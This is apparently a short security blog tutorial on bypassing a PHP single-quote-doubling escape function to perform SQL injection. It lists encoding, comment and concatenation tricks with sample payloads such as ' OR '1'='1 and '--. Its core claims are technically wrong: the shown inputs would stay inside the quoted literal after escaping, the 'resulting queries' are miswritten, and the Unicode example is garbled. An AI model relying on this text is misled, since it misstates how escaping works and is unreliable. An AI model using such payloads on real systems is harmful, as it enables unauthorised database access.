SQL Injection: Bypassing Escape Functions

G5 Cyber Security

2 weeks ago

TL;DR

This guide shows how to bypass a simple SQL escape function using different techniques. It’s for educational purposes only – never use these methods on systems you don’t have permission to test!

Understanding the Problem

Many web applications try to prevent SQL injection by escaping special characters in user input before including it in a query. However, these escape functions aren’t always perfect and can be bypassed.

Scenario

Let’s assume an application uses a function like this (PHP example) to escape single quotes:

function escapeString($string) {
  return str_replace("'", "''", $string);
}

This replaces a single quote (‘) with two single quotes (”). While it prevents basic injection, it’s vulnerable to clever bypasses.

Bypass Techniques

Double Encoding: If the application decodes user input multiple times, you can encode characters repeatedly.

Example: Inputting %27 (URL encoded single quote) might be decoded once to a single quote and then injected into the query.

Character Set Exploitation: Different character sets represent characters differently. You can try using alternative representations of special characters.

Example: Using Unicode characters like ' (HTML entity for a single quote) or U+0027 might bypass the escape function if it doesn’t handle them correctly.

Concatenation: Break up your injection string into smaller parts and concatenate them within the query.

Example (assuming a vulnerable query like SELECT * FROM users WHERE username = '$username'): Inputting ' OR '1'='1 might be escaped to '' OR ''1''=''1, which is still valid SQL.

Using Comments: Insert comments to terminate the original query and start a new one.

Example: Inputting '-- will comment out everything after the single quote. Then you can add your own injection code.

Hex Encoding: Some applications might decode hex-encoded strings.

Example: Inputting 0x27 (hex representation of a single quote) could bypass the escape function if it’s decoded before escaping.

Case Sensitivity Exploits: Some databases are case-insensitive. Try using mixed-case keywords like SeLeCt.

Practical Example

Let’s say the vulnerable application uses the following query:

SELECT * FROM products WHERE name = '$name'

And the escape function is the simple one shown earlier. Here are some potential bypasses:

Using Comments:

Input: '--
Resulting Query: SELECT * FROM products WHERE name = ''-- (The rest of the query is commented out). You can then add another query after this.

Concatenation:

Input: ' OR '1'='1
Resulting Query: SELECT * FROM products WHERE name = '' OR ''1''=''1 (This will likely return all rows).

Important Considerations

Database Type: The specific bypass techniques that work depend on the database system being used (MySQL, PostgreSQL, SQL Server, etc.).
Application Logic: Understand how the application handles user input and constructs queries.
Error Messages: Pay attention to error messages – they can provide clues about the vulnerability and potential bypasses.

Disclaimer

This information is for educational purposes only. Attempting to exploit vulnerabilities without permission is illegal and unethical. Always obtain explicit consent before testing any system.